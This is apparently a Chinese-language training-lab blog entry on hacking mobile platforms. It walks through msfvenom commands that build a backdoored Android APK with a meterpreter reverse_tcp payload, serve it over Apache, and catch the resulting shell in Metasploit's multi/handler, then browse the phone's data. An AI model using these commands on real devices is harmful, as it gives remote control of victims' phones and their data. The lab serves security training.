Day26:今天来聊一下Hacking Mobile Platforms

随着Mobile技术的进步,移动性已成为Internet使用的一个关键特色。

人们的生活方式越来越依赖智能手机和平板电脑。手机使用者能够存取

电子邮件、Internet和GPS导航,并储存联络人清单、密码、日历和登入

密码等资料。并在手机上进行各种交易(网路购物、银行业务及证券交易)

Hacker会利用移动装置的特性向个人发送格式错误的APK(应用程序封装档)

或URL,以诱使受害者点击甚至安装它们,进而授予攻击者访问用户登録数据

的权限,或对其设备进行全部或部分控制。

接下来我们来谈一下Hacking Mobile Platforms中的LAB

登入Parrot Security主机,并输入sudo su切换身份

输入cd切换目録

输入以下指令service postgresql start启动Postgresql DB

输入以下指令建立一个藏有後门的Android APK(网路的APK不要乱装)

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk

将产生的Backdoor.apk复制到/root/Desktop/Backdoor.apk /var/www/html/share/目録

cp /root/Desktop/Backdoor.apk /var/www/html/share/ 

输入指令service apache2 start启动Apache服务

输入指令msfconsole,再执行use exploit/multi/handler

输入以下指令

set payload android/meterpreter/reverse_tcp

set LHOST 10.10.10.13

show options

输入以下指令,执行exploit在背景执行

exploit -j -z

用Android手机到http://10.10.10.13/share 去下载Backdoor.apk

在手机安装Backdoor.apk

我们在meterpreter後台可以看到手机安装Backdoor.apk有连上来

输入指令sessions -i 1,从Meterpreter shell可以看到Android手机的资讯

输入ipconfig可以看到手机连上的IP资讯

输入pwd可以看到手机的储存设备路径

看完以上LAB以後在网路上来路不明的APK请勿下载